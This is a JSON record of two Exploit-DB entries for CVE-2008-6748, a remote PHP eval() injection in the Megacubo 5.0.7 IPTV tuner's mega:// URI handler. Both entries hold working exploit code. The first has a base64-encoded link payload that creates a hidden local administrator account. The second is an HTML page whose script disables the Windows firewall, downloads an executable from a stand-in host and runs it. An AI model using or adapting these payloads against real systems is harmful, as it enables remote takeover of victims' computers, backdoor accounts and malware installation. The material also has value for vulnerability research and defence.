{"exploitdb": [{"lastseen": "2016-02-01T02:37:46", "description": "Megacubo 5.0.7 (mega://) Remote eval() Injection Exploit. CVE-2008-6748. Remote exploit for windows platform", "published": "2008-12-30T00:00:00", "type": "exploitdb", "title": "Megacubo 5.0.7 mega:// Remote eval Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6748"], "modified": "2008-12-30T00:00:00", "id": "EDB-ID:7623", "href": "https://www.exploit-db.com/exploits/7623/", "sourceData": "<!--\nMegacubo 5.0.7 (mega://) remote eval() injection exploit\nby Nine:Situations:Group::pyrokinesis\nsite: http://retrogod.altervista.org/\n\ntested against Internet Explorer 8 beta 2/xp sp 3\n\nsoftware site: http://www.megacubo.net/tv/\ndownload url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023\n\ndescription:\n\"Megacubo is a IPTV tuner application written in PHP + Winbinder.\nIt has a catalogue of links of TV streams which are available\nfor free in the web. At the moment it only runs on Windows(2000,\nXP and Vista).\"\n(note that it is among most downloaded apps on sourceforge, http://sourceforge.net/softwaremap/trove_list.php?form_cat=99)\n\nexplaination:\nit's possible to pass arbitrary php code to the \"play\" command\nof \"mega://\" uri handler which is further copied to the\nc:\\DATASTORE.txt temporary file and evaluated, note the \"con\"\nargument (which is a windows device name) to bypass a file_exists()\ncheck\n\nexample exploit, this run calc.exe:\n\nmega://play|con..\"a()\".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM=')).\"/?\");print(\n\nthe following one execute:\ncmd /c NET USER pyrokinesis pass /ADD && NET LOCALGROUP Administrators /ADD pyrokinesis\n-->\n\n<a href='mega://play|con..\"a()\".system(base64_decode(Y21kIC9jIE5FVCBVU0VSIHB5cm9raW5lc2lzIHBhc3MgL0FERCAmJiBORVQgTE9DQUxHUk9VUCBBZG1pbmlzdHJhdG9ycyAvQUREIHB5cm9raW5lc2lz)).\"/?\");print('>pwn</a>\n\n# milw0rm.com [2008-12-30]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7623/"}, {"lastseen": "2016-02-01T02:38:35", "description": "Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit. CVE-2008-6748. Remote exploit for windows platform", "published": "2009-01-01T00:00:00", "type": "exploitdb", "title": "Megacubo 5.0.7 mega:// Remote File Download and Execute Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6748"], "modified": "2009-01-01T00:00:00", "id": "EDB-ID:7630", "href": "https://www.exploit-db.com/exploits/7630/", "sourceData": "Megacubo 5.0.7 download & Execute\nby :JJunior\nsite: http://www.musicastop.com.br/\n\ntested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3\n\nsoftware site: http://www.megacubo.net/tv/\ndownload url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023\n \ndescription:\n\"Megacubo is a IPTV tuner application written in PHP + Winbinder.\nIt has a catalogue of links of TV streams which are available\nfor free in the web. At the moment it only runs on Windows(2000,\nXP and Vista).\"\n \nexample exploit, download & Execute :\n \n\n<html>\n<head>\n<title>MegaCubo - download & Execute</title>\n<meta http-equiv=\"Content-Type\" content=\"text/html; \">\n</head>\n<body>\n<script>\n// url download & exec code evil\nevil = 'http://www.example.com/evil.exe';\n \n// disable firewall encode base_64\nfirewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';\n \nshellcode = 'mega://play|con..\"a()\".system(base64_decode(\"'+firewall+'\")).fputs(fopen(\"c:/Megacubo.exe\",\"w\"),file_get_contents(\"'+evil+'\")).system(\"C:/Megacubo.exe\").\"/?\");print(';\n \n// shell code\nwindow.location=shellcode;\n\n</script>\n</body>\n</html>\n\n# milw0rm.com [2009-01-01]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7630/"}]}